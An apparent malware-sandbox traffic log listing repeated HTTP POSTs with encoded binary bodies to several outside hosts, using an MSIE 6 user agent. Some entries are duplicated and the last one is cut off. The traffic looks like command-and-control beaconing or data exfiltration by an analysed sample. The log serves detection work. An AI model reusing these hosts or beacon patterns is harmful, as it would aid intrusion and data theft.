                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 75 68 58 30 43 75 6d 52 6b 70 6c 4d 62 51 46 63 75 44 4c 45 72 67 49 36 65 69 2b 48 6c 54 2f 51 4c 5a 50 49 45 43 70 75 64 4d 34 4f 39 68 30 64 39 46 2f 34 2b 55 73 45 4c 33 42 64 79 66 6f 4e 57 38 75 47 49 6c 44 4f 4d 70 57 34 57 65 58 6b 47 35 6d 34 35 50 78 41 74 6e 6e 45 72 6f 6d 62 33 41 2b 72 45 41 4f 64 63 62 47 6e 56 59 37 5a 4c 41 59 36 63 4a 59 4a 75 45 57 72 6e 37 70 65 33 75 46 4f 56 62 62 6c 6b 6d 78 6a 64 33 6d 78 37 79 41 57 34 50 41 74 59 49 2f 71 2b 66 72 54 36 6f 38 68 54 45 67 45 42 66 37 61 50 4f 59 72 4d 47 6a 74 51 59 52 37 6f 37 67 53 4f 7a 50 5a 58 37 4d 39 45 30 49 48 46 59 69 34 47 51 4e 2f 41 68 72 35 54 52 45 67 4c 49 39 52 79 6d 39 36 64 59 79 31 68 4c 6d 77 43 49 42 47 42 70 4d 36 54 77 32 51 4e 50 6e 41 6d 45 66 73 36 61 51 37 70 2b 36 6e 53 55 2f 6a 68 64 4f 69 6e 32 33 31 59 6f 35 50 56 65 69 44 68 69 55 68 6d 4d 39 4d 4e 38 77 4b 44 6b 69 58 42 7a 39 31 73 34 62 62 65 48 49 43 58 41 64 75 71 63 6a 59 6f 41 62 57 6b 4a 51 2f 2b 6e 72 4e 78 31 67 39 53 32 4e 6e 77 4b 6a 2b 4f 47 4b 69 6c 66 6f 7a 56 67 35 49 43 76 45 79 37 41 42 74 65 56 52 4a 55 4b 47 4f 35 78 55 6d 53 44 46 38 58 31 74 63 59 46 79 46 44 4d 67 6c 38 53 4c 34 65 36 53 76 54 4a 4d 72 54 36 39 61 34 31 31 61 2b 42 63 37 52 57 72 47 41 6f 2f 30 4a 58 4d 73 70 6a 58 51 49 42 33 6a 70 72 72 30 55 56 54 6f 66 32 69 66 42 77 44 51 41 44 36 69 42 47 2f 73 32 6b 50 4b 6a 67 59 58 32 78 4a 50 4b 53 31 4d 32 67 48 72 67 6d 44 41 64 65 50 45 45 7a 32 72 33 4b 61 59 4d 37 75 35 54 62 2f 2f 6d 50 63 2b 64 34 45 4f 69 6b 64 4c 53 6c 55 48 32 4b 2f 49 2f 46 47 61 32 6c 67 2f 62 4d 58 54 71 63 6f 3d Data Ascii: uhX0CumRkplMbQFcuDLErgI6ei+HlT/QLZPIECpudM4O9h0d9F/4+UsEL3BdyfoNW8uGIlDOMpW4WeXkG5m45PxAtnnEromb3A+rEAOdcbGnVY7ZLAY6cJYJuEWrn7pe3uFOVbblkmxjd3mx7yAW4PAtYI/q+frT6o8hTEgEBf7aPOYrMGjtQYR7o7gSOzPZX7M9E0IHFYi4GQN/Ahr5TREgLI9Rym96dYy1hLmwCIBGBpM6Tw2QNPnAmEfs6aQ7p+6nSU/jhdOin231Yo5PVeiDhiUhmM9MN8wKDkiXBz91s4bbeHICXAduqcjYoAbWkJQ/+nrNx1g9S2NnwKj+OGKilfozVg5ICvEy7ABteVRJUKGO5xUmSDF8X1tcYFyFDMgl8SL4e6SvTJMrT69a411a+Bc7RWrGAo/0JXMspjXQIB3jprr0UVTof2ifBwDQAD6iBG/s2kPKjgYX2xJPKS1M2gHrgmDAdePEEz2r3KaYM7u5Tb//mPc+d4EOikdLSlUH2K/I/FGa2lg/bMXTqco=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 30 4a 36 73 2f 32 2b 45 6d 70 6b 58 6a 46 49 35 6a 75 66 69 69 48 68 34 4d 53 65 46 43 59 2f 6d 45 39 74 31 6d 4a 4f 76 43 6d 55 4a 41 52 5a 45 4a 61 64 4b 6e 34 39 6c 49 70 55 32 57 6e 5a 36 4a 6d 45 52 2b 71 74 70 2f 70 4c 47 2f 37 79 64 35 2b 44 35 56 43 5a 67 73 73 49 59 71 4a 30 70 49 73 46 50 69 41 4e 35 58 31 67 4d 37 66 2f 58 4b 6d 74 54 68 4c 33 77 79 53 46 67 67 33 33 4b 59 78 30 73 4b 66 66 7a 32 2f 6f 36 70 54 38 73 55 53 66 70 4b 39 4a 31 46 46 5a 52 37 79 46 50 54 69 44 30 72 32 73 64 75 67 69 4e 4a 4f 33 76 66 76 48 38 34 31 77 66 54 47 43 68 74 58 62 4e 2b 6d 56 38 41 65 43 50 6c 6c 54 35 4c 46 59 5a 41 6d 4f 6e 77 46 74 53 6c 48 51 4f 62 56 72 36 48 31 4e 2f 5a 46 65 58 37 41 4f 73 36 67 53 67 48 32 50 4b 2b 7a 78 2b 51 50 4b 43 7a 30 4a 39 45 44 36 58 72 78 7a 52 6d 57 62 39 36 38 66 71 77 4d 41 2f 49 46 45 38 77 52 46 74 52 39 63 74 6a 49 6b 56 4a 62 53 38 45 78 39 4e 4b 6a 52 47 52 30 37 69 38 4b 6c 44 6c 4d 36 6a 62 64 49 65 45 78 73 4e 6b 6b 32 59 6a 34 2f 52 66 53 45 76 44 66 57 64 47 49 75 44 6c 59 54 4e 68 37 43 30 30 79 5a 6c 44 36 4a 53 6a 69 72 67 70 6e 35 57 76 6d 47 47 36 49 37 52 66 69 77 59 76 76 71 58 67 64 54 62 62 57 75 43 2f 6e 6d 67 45 64 6f 4b 7a 44 74 34 48 79 70 7a 6e 39 56 55 2b 30 42 46 4f 73 72 46 6d 63 75 44 57 5a 52 35 68 34 44 69 34 47 63 6a 56 54 68 72 65 54 70 58 6f 41 76 66 44 58 56 39 6d 32 70 7a 39 77 4a 4a 39 74 61 38 72 4a 73 65 42 73 55 75 74 77 67 46 43 7a 6a 72 4a 4b 42 51 63 68 78 49 51 6d 4e 59 49 6e 4e 72 37 56 6e 4d 67 62 4d 5a 46 41 31 44 74 35 36 31 31 52 44 6a 35 56 38 53 6e 6e 45 45 4c 4f 44 65 70 65 78 74 6c 43 6a 76 32 6d 56 4f 58 57 59 74 43 4d 38 78 70 65 51 74 76 39 56 79 4a 41 3d 3d Data Ascii: 0J6s/2+EmpkXjFI5jufiiHh4MSeFCY/mE9t1mJOvCmUJARZEJadKn49lIpU2WnZ6JmER+qtp/pLG/7yd5+D5VCZgssIYqJ0pIsFPiAN5X1gM7f/XKmtThL3wySFgg33KYx0sKffz2/o6pT8sUSfpK9J1FFZR7yFPTiD0r2sdugiNJO3vfvH841wfTGChtXbN+mV8AeCPllT5LFYZAmOnwFtSlHQObVr6H1N/ZFeX7AOs6gSgH2PK+zx+QPKCz0J9ED6XrxzRmWb968fqwMA/IFE8wRFtR9ctjIkVJbS8Ex9NKjRGR07i8KlDlM6jbdIeExsNkk2Yj4/RfSEvDfWdGIuDlYTNh7C00yZlD6JSjirgpn5WvmGG6I7RfiwYvvqXgdTbbWuC/nmgEdoKzDt4Hypzn9VU+0BFOsrFmcuDWZR5h4Di4GcjVThreTpXoAvfDXV9m2pz9wJJ9ta8rJseBsUutwgFCzjrJKBQchxIQmNYInNr7VnMgbMZFA1Dt5611RDj5V8SnnEELODepextlCjv2mVOXWYtCM8xpeQtv9VyJA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 30 4a 36 73 2f 32 2b 45 6d 70 6b 58 6a 46 49 35 6a 75 66 69 69 48 68 34 4d 53 65 46 43 59 2f 6d 45 39 74 31 6d 4a 4f 76 43 6d 55 4a 41 52 5a 45 4a 61 64 4b 6e 34 39 6c 49 70 55 32 57 6e 5a 36 4a 6d 45 52 2b 71 74 70 2f 70 4c 47 2f 37 79 64 35 2b 44 35 56 43 5a 67 73 73 49 59 71 4a 30 70 49 73 46 50 69 41 4e 35 58 31 67 4d 37 66 2f 58 4b 6d 74 54 68 4c 33 77 79 53 46 67 67 33 33 4b 59 78 30 73 4b 66 66 7a 32 2f 6f 36 70 54 38 73 55 53 66 70 4b 39 4a 31 46 46 5a 52 37 79 46 50 54 69 44 30 72 32 73 64 75 67 69 4e 4a 4f 33 76 66 76 48 38 34 31 77 66 54 47 43 68 74 58 62 4e 2b 6d 56 38 41 65 43 50 6c 6c 54 35 4c 46 59 5a 41 6d 4f 6e 77 46 74 53 6c 48 51 4f 62 56 72 36 48 31 4e 2f 5a 46 65 58 37 41 4f 73 36 67 53 67 48 32 50 4b 2b 7a 78 2b 51 50 4b 43 7a 30 4a 39 45 44 36 58 72 78 7a 52 6d 57 62 39 36 38 66 71 77 4d 41 2f 49 46 45 38 77 52 46 74 52 39 63 74 6a 49 6b 56 4a 62 53 38 45 78 39 4e 4b 6a 52 47 52 30 37 69 38 4b 6c 44 6c 4d 36 6a 62 64 49 65 45 78 73 4e 6b 6b 32 59 6a 34 2f 52 66 53 45 76 44 66 57 64 47 49 75 44 6c 59 54 4e 68 37 43 30 30 79 5a 6c 44 36 4a 53 6a 69 72 67 70 6e 35 57 76 6d 47 47 36 49 37 52 66 69 77 59 76 76 71 58 67 64 54 62 62 57 75 43 2f 6e 6d 67 45 64 6f 4b 7a 44 74 34 48 79 70 7a 6e 39 56 55 2b 30 42 46 4f 73 72 46 6d 63 75 44 57 5a 52 35 68 34 44 69 34 47 63 6a 56 54 68 72 65 54 70 58 6f 41 76 66 44 58 56 39 6d 32 70 7a 39 77 4a 4a 39 74 61 38 72 4a 73 65 42 73 55 75 74 77 67 46 43 7a 6a 72 4a 4b 42 51 63 68 78 49 51 6d 4e 59 49 6e 4e 72 37 56 6e 4d 67 62 4d 5a 46 41 31 44 74 35 36 31 31 52 44 6a 35 56 38 53 6e 6e 45 45 4c 4f 44 65 70 65 78 74 6c 43 6a 76 32 6d 56 4f 58 57 59 74 43 4d 38 78 70 65 51 74 76 39 56 79 4a 41 3d 3d Data Ascii: 0J6s/2+EmpkXjFI5jufiiHh4MSeFCY/mE9t1mJOvCmUJARZEJadKn49lIpU2WnZ6JmER+qtp/pLG/7yd5+D5VCZgssIYqJ0pIsFPiAN5X1gM7f/XKmtThL3wySFgg33KYx0sKffz2/o6pT8sUSfpK9J1FFZR7yFPTiD0r2sdugiNJO3vfvH841wfTGChtXbN+mV8AeCPllT5LFYZAmOnwFtSlHQObVr6H1N/ZFeX7AOs6gSgH2PK+zx+QPKCz0J9ED6XrxzRmWb968fqwMA/IFE8wRFtR9ctjIkVJbS8Ex9NKjRGR07i8KlDlM6jbdIeExsNkk2Yj4/RfSEvDfWdGIuDlYTNh7C00yZlD6JSjirgpn5WvmGG6I7RfiwYvvqXgdTbbWuC/nmgEdoKzDt4Hypzn9VU+0BFOsrFmcuDWZR5h4Di4GcjVThreTpXoAvfDXV9m2pz9wJJ9ta8rJseBsUutwgFCzjrJKBQchxIQmNYInNr7VnMgbMZFA1Dt5611RDj5V8SnnEELODepextlCjv2mVOXWYtCM8xpeQtv9VyJA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6b 31 33 4e 35 55 7a 75 75 70 6b 6d 45 6b 6d 52 74 31 56 4c 79 31 2f 4c 2b 75 55 6b 79 5a 53 41 51 45 54 4d 75 50 6a 53 30 50 43 42 44 65 37 44 6f 4d 75 38 4f 4e 68 54 6f 32 38 55 52 66 52 71 46 35 43 49 30 49 52 63 6c 52 39 69 4d 59 47 52 68 42 31 69 6b 75 48 39 32 39 36 67 46 4b 59 49 65 6b 56 32 36 35 5a 64 48 66 5a 4e 49 49 34 61 46 5a 33 64 5a 54 68 4a 57 33 61 73 52 58 6b 4e 41 57 71 77 54 69 4b 72 43 2b 64 51 51 39 67 38 6e 54 55 52 70 45 75 79 36 64 6c 76 6e 74 64 65 36 4a 47 34 53 56 54 4b 56 37 32 4d 5a 43 45 37 78 6a 74 54 65 7a 72 39 59 32 35 58 4d 74 52 59 77 64 6a 48 6f 66 39 70 6f 6f 53 47 57 64 73 5a 69 7a 42 33 2f 69 49 47 46 32 69 57 73 75 2b 62 34 44 74 37 74 7a 58 66 56 58 49 47 6a 4a 4c 59 4a 54 4c 32 35 30 6e 77 33 38 55 61 62 52 65 65 50 44 4e 68 62 5a 46 50 48 73 34 66 2b 61 79 78 62 75 42 4d 4f 57 41 35 41 42 65 6e 46 7a 70 31 56 37 51 79 76 56 2f 6d 6c 63 6f 78 74 4f 55 47 38 57 30 57 54 4a 57 51 42 76 54 58 59 33 6e 4e 70 65 6d 4e 65 4b 48 48 42 73 34 4c 43 62 32 50 37 74 35 62 4e 69 35 47 53 49 56 4b 6e 76 6c 69 52 76 4f 4c 67 54 58 6b 79 77 44 61 54 49 66 50 75 69 61 2b 62 39 6f 72 62 43 6e 76 4b 36 36 61 70 75 46 6a 4a 36 56 4b 4c 4f 58 78 56 5a 6e 48 35 46 7a 72 30 32 62 54 6f 31 6c 4b 69 76 6d 69 4e 4d 48 41 67 53 42 53 55 77 4c 31 32 59 68 35 45 5a 54 50 2f 65 59 68 77 45 4c 78 43 43 41 4d 35 38 69 79 58 66 53 64 75 6e 62 39 47 5a 6c 47 74 33 4f 6c 77 34 52 68 38 6b 68 47 6c 52 65 55 70 30 69 72 41 62 4c 36 59 77 42 50 73 47 43 59 64 7a 4b 39 33 35 4e 43 56 69 64 45 34 69 47 33 38 30 31 55 51 30 7a 52 77 7a 75 5a 63 45 6b 3d Data Ascii: k13N5UzuupkmEkmRt1VLy1/L+uUkyZSAQETMuPjS0PCBDe7DoMu8ONhTo28URfRqF5CI0IRclR9iMYGRhB1ikuH9296gFKYIekV265ZdHfZNII4aFZ3dZThJW3asRXkNAWqwTiKrC+dQQ9g8nTURpEuy6dlvntde6JG4SVTKV72MZCE7xjtTezr9Y25XMtRYwdjHof9pooSGWdsZizB3/iIGF2iWsu+b4Dt7tzXfVXIGjJLYJTL250nw38UabReePDNhbZFPHs4f+ayxbuBMOWA5ABenFzp1V7QyvV/mlcoxtOUG8W0WTJWQBvTXY3nNpemNeKHHBs4LCb2P7t5bNi5GSIVKnvliRvOLgTXkywDaTIfPuia+b9orbCnvK66apuFjJ6VKLOXxVZnH5Fzr02bTo1lKivmiNMHAgSBSUwL12Yh5EZTP/eYhwELxCCAM58iyXfSdunb9GZlGt3Olw4Rh8khGlReUp0irAbL6YwBPsGCYdzK935NCVidE4iG3801UQ0zRwzuZcEk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 73 6e 36 4f 56 4c 43 34 2b 4a 6c 63 5a 59 57 38 77 33 54 57 4d 47 4e 58 59 59 56 59 50 66 63 67 35 42 71 77 79 74 49 4e 62 4d 58 50 73 64 42 37 31 44 62 42 6e 67 33 69 58 44 4b 55 59 41 49 77 79 32 78 47 67 49 43 4a 36 2f 6d 30 6a 4f 68 49 65 2b 72 6b 5a 58 6b 4f 4d 34 6c 55 7a 33 4b 37 55 64 34 41 33 30 75 63 51 62 63 2b 64 71 4e 47 33 77 70 66 64 6b 6f 42 65 39 47 50 62 38 37 5a 36 31 5a 70 54 48 4c 37 32 2b 72 6c 42 51 42 63 33 71 55 32 63 51 68 71 6c 67 49 50 31 6e 59 37 75 4a 65 6a 38 4c 64 6f 41 54 75 37 62 73 73 78 6c 59 74 68 45 62 7a 52 47 51 38 6f 62 7a 32 77 43 5a 4f 41 6f 78 42 58 69 66 45 45 42 45 71 37 62 65 54 45 2f 48 46 58 52 4b 74 32 73 67 78 36 78 73 34 73 62 76 74 55 63 6d 6a 45 53 70 72 43 4a 2f 4e 70 4e 73 6e 71 45 44 58 31 36 71 47 4b 4b 57 46 6f 4b 49 58 54 45 58 68 69 46 57 65 34 69 4d 32 35 45 59 78 37 6f 4d 7a 49 2f 2b 2f 33 4b 2f 6d 37 6b 68 64 4c 76 64 68 7a 79 34 6c 52 49 77 57 68 5a 31 58 46 76 7a 6e 4d 7a 6e 56 65 68 48 30 51 59 62 58 61 76 64 6b 7a 49 6b 6b 34 32 37 30 77 77 44 74 79 47 57 43 42 47 65 51 67 4a 54 32 4a 6d 5a 67 2b 57 4f 46 39 67 75 66 6c 46 59 41 55 63 41 4f 48 4b 70 4f 47 44 47 4d 79 6b 45 62 50 69 59 2f 73 58 51 2f 67 7a 52 4e 57 54 75 54 77 76 36 63 6e 35 45 77 6e 76 4d 30 59 53 49 69 61 55 74 48 34 6e 6d 45 76 71 62 4b 50 38 54 78 43 43 44 51 6a 41 7a 31 54 52 6f 78 78 30 64 47 5a 7a 2f 30 64 63 58 49 52 70 35 74 44 54 7a 2b 45 46 71 5a 64 5a 36 39 33 47 6d 64 62 76 38 4c 63 75 5a 37 53 4a 45 5a 31 2f 43 68 49 6d 31 59 4a 4b 6c 65 70 56 6f 4e 50 4b 73 61 75 4a 75 35 6f 7a 73 70 75 48 4e 73 4a 72 71 55 3d Data Ascii: sn6OVLC4+JlcZYW8w3TWMGNXYYVYPfcg5BqwytINbMXPsdB71DbBng3iXDKUYAIwy2xGgICJ6/m0jOhIe+rkZXkOM4lUz3K7Ud4A30ucQbc+dqNG3wpfdkoBe9GPb87Z61ZpTHL72+rlBQBc3qU2cQhqlgIP1nY7uJej8LdoATu7bssxlYthEbzRGQ8obz2wCZOAoxBXifEEBEq7beTE/HFXRKt2sgx6xs4sbvtUcmjESprCJ/NpNsnqEDX16qGKKWFoKIXTEXhiFWe4iM25EYx7oMzI/+/3K/m7khdLvdhzy4lRIwWhZ1XFvznMznVehH0QYbXavdkzIkk4270wwDtyGWCBGeQgJT2JmZg+WOF9guflFYAUcAOHKpOGDGMykEbPiY/sXQ/gzRNWTuTwv6cn5EwnvM0YSIiaUtH4nmEvqbKP8TxCCDQjAz1TRoxx0dGZz/0dcXIRp5tDTz+EFqZdZ693Gmdbv8LcuZ7SJEZ1/ChIm1YJKlepVoNPKsauJu5ozspuHNsJrqU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 73 6e 36 4f 56 4c 43 34 2b 4a 6c 63 5a 59 57 38 77 33 54 57 4d 47 4e 58 59 59 56 59 50 66 63 67 35 42 71 77 79 74 49 4e 62 4d 58 50 73 64 42 37 31 44 62 42 6e 67 33 69 58 44 4b 55 59 41 49 77 79 32 78 47 67 49 43 4a 36 2f 6d 30 6a 4f 68 49 65 2b 72 6b 5a 58 6b 4f 4d 34 6c 55 7a 33 4b 37 55 64 34 41 33 30 75 63 51 62 63 2b 64 71 4e 47 33 77 70 66 64 6b 6f 42 65 39 47 50 62 38 37 5a 36 31 5a 70 54 48 4c 37 32 2b 72 6c 42 51 42 63 33 71 55 32 63 51 68 71 6c 67 49 50 31 6e 59 37 75 4a 65 6a 38 4c 64 6f 41 54 75 37 62 73 73 78 6c 59 74 68 45 62 7a 52 47 51 38 6f 62 7a 32 77 43 5a 4f 41 6f 78 42 58 69 66 45 45 42 45 71 37 62 65 54 45 2f 48 46 58 52 4b 74 32 73 67 78 36 78 73 34 73 62 76 74 55 63 6d 6a 45 53 70 72 43 4a 2f 4e 70 4e 73 6e 71 45 44 58 31 36 71 47 4b 4b 57 46 6f 4b 49 58 54 45 58 68 69 46 57 65 34 69 4d 32 35 45 59 78 37 6f 4d 7a 49 2f 2b 2f 33 4b 2f 6d 37 6b 68 64 4c 76 64 68 7a 79 34 6c 52 49 77 57 68 5a 31 58 46 76 7a 6e 4d 7a 6e 56 65 68 48 30 51 59 62 58 61 76 64 6b 7a 49 6b 6b 34 32 37 30 77 77 44 74 79 47 57 43 42 47 65 51 67 4a 54 32 4a 6d 5a 67 2b 57 4f 46 39 67 75 66 6c 46 59 41 55 63 41 4f 48 4b 70 4f 47 44 47 4d 79 6b 45 62 50 69 59 2f 73 58 51 2f 67 7a 52 4e 57 54 75 54 77 76 36 63 6e 35 45 77 6e 76 4d 30 59 53 49 69 61 55 74 48 34 6e 6d 45 76 71 62 4b 50 38 54 78 43 43 44 51 6a 41 7a 31 54 52 6f 78 78 30 64 47 5a 7a 2f 30 64 63 58 49 52 70 35 74 44 54 7a 2b 45 46 71 5a 64 5a 36 39 33 47 6d 64 62 76 38 4c 63 75 5a 37 53 4a 45 5a 31 2f 43 68 49 6d 31 59 4a 4b 6c 65 70 56 6f 4e 50 4b 73 61 75 4a 75 35 6f 7a 73 70 75 48 4e 73 4a 72 71 55 3d Data Ascii: sn6OVLC4+JlcZYW8w3TWMGNXYYVYPfcg5BqwytINbMXPsdB71DbBng3iXDKUYAIwy2xGgICJ6/m0jOhIe+rkZXkOM4lUz3K7Ud4A30ucQbc+dqNG3wpfdkoBe9GPb87Z61ZpTHL72+rlBQBc3qU2cQhqlgIP1nY7uJej8LdoATu7bssxlYthEbzRGQ8obz2wCZOAoxBXifEEBEq7beTE/HFXRKt2sgx6xs4sbvtUcmjESprCJ/NpNsnqEDX16qGKKWFoKIXTEXhiFWe4iM25EYx7oMzI/+/3K/m7khdLvdhzy4lRIwWhZ1XFvznMznVehH0QYbXavdkzIkk4270wwDtyGWCBGeQgJT2JmZg+WOF9guflFYAUcAOHKpOGDGMykEbPiY/sXQ/gzRNWTuTwv6cn5EwnvM0YSIiaUtH4nmEvqbKP8TxCCDQjAz1TRoxx0dGZz/0dcXIRp5tDTz+EFqZdZ693Gmdbv8LcuZ7SJEZ1/ChIm1YJKlepVoNPKsauJu5ozspuHNsJrqU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 71 77 35 59 6a 4b 6f 5a 4a 4a 71 50 4a 67 70 37 6a 66 30 58 39 47 30 77 6a 75 58 61 34 6b 70 35 66 75 62 75 70 35 67 76 46 33 4b 51 31 2f 6c 62 2f 2b 2f 30 59 6e 4f 6c 56 2b 51 62 6b 44 2b 55 61 4e 63 78 59 74 2b 4f 2f 7a 6a 48 77 6c 54 53 44 45 4e 46 73 42 30 4d 68 4e 43 71 50 66 4f 76 69 4e 35 6e 50 38 53 41 4c 59 51 6b 38 57 75 4c 76 58 48 45 7a 34 66 6a 76 42 57 4b 6d 36 57 4b 61 68 51 4d 2b 62 70 4e 38 6e 68 4c 69 47 74 74 38 35 46 69 38 2f 77 77 4d 49 6b 6d 4c 30 36 71 31 70 6b 34 61 77 64 74 68 69 51 39 67 4e 58 51 58 69 67 45 4b 32 51 38 4c 48 35 72 2f 2b 77 74 41 36 56 59 33 2b 44 78 50 64 69 67 4e 4e 5a 33 4f 6e 35 35 50 77 48 79 4f 41 53 5a 78 46 49 56 54 77 50 63 34 75 37 45 6a 37 6d 69 53 71 63 66 36 4d 68 62 47 4a 6b 66 59 39 77 46 6f 66 6a 38 47 70 63 64 47 78 57 69 49 43 36 79 7a 59 32 32 63 6e 72 39 67 37 6c 6e 54 30 6f 30 45 54 56 64 52 4f 43 46 52 75 4c 6c 77 69 4c 68 65 38 34 4e 77 30 4a 2b 56 4e 71 50 59 76 47 71 6f 6a 41 31 32 70 49 35 57 4d 4c 4f 4c 56 45 2b 5a 30 72 63 2b 39 77 50 75 59 6a 42 66 39 53 30 48 33 59 77 67 30 53 46 72 65 61 4b 6f 59 74 52 6a 6f 51 54 76 34 30 44 64 4a 55 75 68 38 61 36 47 4e 72 65 49 54 71 6c 55 58 6c 4f 55 69 2b 39 2b 37 73 79 63 57 6c 2f 75 65 39 53 56 53 6a 65 58 43 6f 6e 4d 70 35 63 5a 31 6c 51 49 67 63 79 4e 70 67 75 4f 67 4d 72 45 63 79 4a 45 6a 64 54 6a 33 35 6f 4c 4d 66 63 59 71 51 32 66 30 34 41 53 44 71 79 41 33 74 70 42 72 44 57 4b 75 32 72 48 74 39 2f 63 74 59 43 67 35 6f 71 34 68 56 33 35 7a 6a 4a 56 75 62 30 36 58 5a 54 68 76 33 57 64 2b 53 55 49 51 72 57 51 48 45 35 7a 63 44 76 6f 53 42 37 53 75 45 36 31 49 79 30 51 45 37 44 6e 69 62 4f 41 66 51 7a 59 54 41 3d Data Ascii: qw5YjKoZJJqPJgp7jf0X9G0wjuXa4kp5fubup5gvF3KQ1/lb/+/0YnOlV+QbkD+UaNcxYt+O/zjHwlTSDENFsB0MhNCqPfOviN5nP8SALYQk8WuLvXHEz4fjvBWKm6WKahQM+bpN8nhLiGtt85Fi8/wwMIkmL06q1pk4awdthiQ9gNXQXigEK2Q8LH5r/+wtA6VY3+DxPdigNNZ3On55PwHyOASZxFIVTwPc4u7Ej7miSqcf6MhbGJkfY9wFofj8GpcdGxWiIC6yzY22cnr9g7lnT0o0ETVdROCFRuLlwiLhe84Nw0J+VNqPYvGqojA12pI5WMLOLVE+Z0rc+9wPuYjBf9S0H3Ywg0SFreaKoYtRjoQTv40DdJUuh8a6GNreITqlUXlOUi+9+7sycWl/ue9SVSjeXConMp5cZ1lQIgcyNpguOgMrEcyJEjdTj35oLMfcYqQ2f04ASDqyA3tpBrDWKu2rHt9/ctYCg5oq4hV35zjJVub06XZThv3Wd+SUIQrWQHE5zcDvoSB7SuE61Iy0QE7DnibOAfQzYTA=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 43 59 45 37 62 51 4d 58 49 35 70 77 6e 47 58 59 43 6c 43 74 53 69 78 73 5a 2f 4b 70 45 66 71 44 35 37 51 49 6e 6d 77 50 75 36 30 58 45 7a 67 77 45 46 78 47 2b 46 42 68 5a 75 44 4a 58 33 35 58 46 59 36 4a 70 4b 61 63 36 6f 4b 32 45 61 48 41 78 79 42 56 74 34 4f 48 78 35 7a 35 43 62 51 44 4d 36 6d 51 39 64 5a 49 74 62 47 46 7a 70 58 6d 43 2f 5a 4e 67 73 4f 31 44 74 2f 47 46 38 58 64 48 65 57 66 4b 69 6c 73 57 4a 4c 6c 33 65 6c 53 47 4e 65 35 4e 4c 36 7a 68 2f 56 4a 44 63 54 2f 58 50 78 79 68 79 46 7a 45 2f 7a 76 4b 5a 75 72 55 68 78 32 56 36 7a 54 66 70 62 36 32 45 36 4d 58 79 64 47 2b 30 72 62 42 68 6b 31 55 4e 32 52 44 35 35 36 46 6f 53 4f 76 6c 56 46 4b 7a 53 66 42 41 51 51 32 4d 6f 4d 34 6d 64 31 72 59 34 72 32 33 74 4f 79 53 47 79 53 42 37 34 65 2b 6a 43 56 41 5a 47 50 44 50 43 4d 56 79 6b 74 47 36 4e 55 65 43 31 32 4a 4e 37 43 31 63 66 7a 6f 4b 46 43 78 65 37 42 64 4d 6e 38 6c 37 4f 2b 75 77 47 63 46 57 78 50 77 6c 32 51 45 67 35 38 47 4e 66 72 68 63 6f 35 68 50 7a 63 41 46 59 72 66 54 75 42 32 66 32 44 6a 78 4f 63 45 2b 76 64 47 46 2b 59 6c 5a 51 45 34 57 49 71 68 2f 75 70 77 49 7a 68 70 4a 6c 78 6a 75 75 68 4c 59 37 37 5a 38 6b 69 55 61 51 43 63 34 4f 37 54 54 6d 57 4a 75 2f 58 69 44 5a 68 6f 56 54 4d 65 61 68 76 79 4a 76 64 51 64 31 4c 78 76 74 50 63 4b 46 5a 2b 4e 47 63 4b 6d 37 7a 72 2b 50 44 63 72 55 6f 75 56 31 65 59 46 4d 2b 7a 57 76 74 45 55 54 4f 79 4f 72 44 34 71 59 44 4a 71 76 58 6c 7a 4b 48 68 43 56 6f 62 61 46 6a 53 4a 6a 6b 77 75 48 63 62 32 56 49 7a 53 4c 58 6e 4b 37 47 6c 54 51 72 71 47 32 46 2f 68 45 55 56 34 71 4a 5a 2b 61 6f 35 77 67 35 44 76 41 46 75 32 38 4e 63 6c 78 4c 4f 64 77 2b 2b 6b 75 35 63 33 63 58 61 62 6e 56 53 42 32 33 49 43 64 6a 51 6f 35 41 36 36 44 64 46 76 6c 66 67 73 3d Data Ascii: 